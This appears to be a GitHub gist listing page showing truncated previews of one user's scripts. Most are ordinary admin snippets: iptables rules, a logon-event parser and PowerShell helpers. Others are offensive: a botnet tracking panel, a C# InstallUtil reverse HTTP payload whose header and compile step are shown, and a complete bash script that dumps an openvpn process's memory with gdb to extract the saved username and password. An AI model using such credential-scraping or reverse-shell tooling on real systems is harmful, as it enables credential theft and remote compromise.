johnjohnsp1
johnjohnsp1
/ tracking.js
Last active
September 12, 2015 03:05
My botnet tracking panel converted to reference a static gist as a demonstration. I'm new to nodejs, so feel free to point out any glaring issues.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var blessed = require('blessed'); | |
| var contrib = require('blessed-contrib'); | |
| var screen = blessed.screen(); | |
| var request = require("request"); | |
| // You need to install dependencies: | |
| // npm install blessed blessed-contrib | |
| // Constants |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script Language = JavaScript> | |
| //----------------------------------------------------------------------------------------------- | |
| // adSiteInfo.js | |
| // | |
| //----------------------------------------------------------------------------------------------- | |
| var objADSysInfo = new ActiveXObject("ADSystemInfo"); | |
| var objNetwork = new ActiveXObject("WScript.Network"); | |
| var objRootDSE = null; |
johnjohnsp1
/ Get-WindowsLogonEvents.ps1
Created
October 2, 2015 12:18
— forked from sunnyc7/Get-WindowsLogonEvents.ps1
Script to parse Windows login data from Forwarded Events.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $eventLogCollector= 'MYSERVER' | |
| #XML Filter for Get-WinEvent | |
| $eventFilter = @" | |
| <QueryList> | |
| <Query Id="0" Path="ForwardedEvents"> | |
| <Select Path="ForwardedEvents">*[System[(EventID=4624 or EventID=4800 or EventID=4801 or EventID=4634)]]</Select> | |
| </Query> | |
| </QueryList> | |
| "@ |
johnjohnsp1
/ gist:6131c71a9ba347f4f0f5
Created
October 3, 2015 12:21
— forked from omar-yassin/gist:7776278
IPTABLES cheatsheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ADD RULE with PORT and IPADDRESS | |
| sudo iptables -A INPUT -p tcp -m tcp --dport port_number -s ip_address -j ACCEPT | |
| ADD RULE for PORT on all addresses | |
| sudo iptables -A INPUT -p tcp -m tcp --dport port_number --sport 1024:65535 -j ACCEPT | |
| DROP IPADRESS | |
| sudo iptables -I INPUT -s x.x.x.x -j DROP | |
| VIEW IPTABLES with rule numbers |
johnjohnsp1
/ tokens.sh
Created
October 4, 2015 19:14
— forked from glennblock/tokens.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #creates A LOT of tokens | |
| #!/bin/bash | |
| for i in `seq 1 100000`; | |
| do | |
| stanza="[http://test$i]" | |
| printf '\n\n%s\n' $stanza >> inputs.conf | |
| printf 'disabled = 0\n' >> inputs.conf | |
| guid=`uuidgen` | |
| printf 'token = %s' $guid >> inputs.conf | |
| done |
johnjohnsp1
/ rev_http.cs
Created
October 15, 2015 07:55
InstallUtil - Download And Execute Reverse_HTTP Payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Step One: | |
| C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:revshell.exe rev_http.cs |
johnjohnsp1
/ openvpnScraper.sh
Created
October 20, 2015 13:00
— forked from rvrsh3ll/openvpnScraper.sh
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # This little hack-job will grab credentials from a running openvpn process in Linux | |
| # Keep in mind this won't work if the user used the --auth-nocache flag | |
| grep rw-p /proc/$1/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $1 -ex "dump memory $1-$start-$stop.dump 0x$start 0x$stop"; done | |
| echo "Your credentials should be listed below as username/password" | |
| strings *.dump | grep -B2 KnOQ | grep -v KnOQ | |
| rm *.dump --force |
johnjohnsp1
/ CFSBuddy.ps1
Created
October 20, 2015 13:01
— forked from dfinke/CFSBuddy.ps1
PowerShell v5.0 ConvertFrom-String Buddy - A GUI that helps you work with this new powerful cmdlet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -Version 5.0.9814.0 | |
| if(!($PSVersionTable.PSVersion.Major -ge 5 -and $PSVersionTable.PSVersion.Build -ge 9814)) { | |
| "Sorry you need PSVersion 5.0.9814.0 or newer" | |
| $psversiontable | |
| return | |
| } | |
| Add-Type -AssemblyName presentationframework |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
johnjohnsp1
/ Get-ExcelColumnName.ps1
Created
December 6, 2015 20:29
— forked from dfinke/Get-ExcelColumnName.ps1
Calculate Excel Column Name from a Column Number
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-ExcelColumnName { | |
| param( | |
| [Parameter(ValueFromPipeline=$true)] | |
| $columnNumber=1 | |
| ) | |
| Process { | |
| $dividend = $columnNumber | |
| $columnName = @() | |
| while($dividend -gt 0) { |